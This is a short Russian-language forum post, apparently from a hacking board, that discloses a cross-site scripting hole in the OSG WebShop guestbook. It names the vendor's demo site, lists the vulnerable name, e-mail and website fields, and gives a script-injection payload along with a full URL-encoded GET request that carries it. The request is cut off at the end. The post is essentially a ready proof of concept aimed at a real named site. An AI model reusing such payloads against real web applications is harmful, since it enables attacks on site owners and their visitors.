06.12.2010, 02:19
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
OSG WebShop
офф сайт: http://www.osg.ru/
Xss
Код:
Code:
http://www.demo.osg.ru/forum.html
Вбиваем ">alert('ded-m0r0z')
Уязвимые поля:
Код:
Code:
Ваше имя
Ваш e-mail
Ваш адрес в Internet
ну и гет запрос будет примерно таким:
Код:
Code:
http://www.demo.osg.ru/forum.html?idc=0&stype=0&pgn=1&idbook=97&idmain=0&idmess=0&rnd=14613&pgn=1&s_cf=28%2E50&s_ch=6A675D26682717306851D40C1878BD14&gbmess=%22%3E%3Cscript%3Ealert%28%27ded%2Dm0r0z%27%29%3C%2Fscript%3E&idbook=97&gbwww=%22%3E%3Cscript%3Ealert%28%27ded%2Dm0r
|
|
|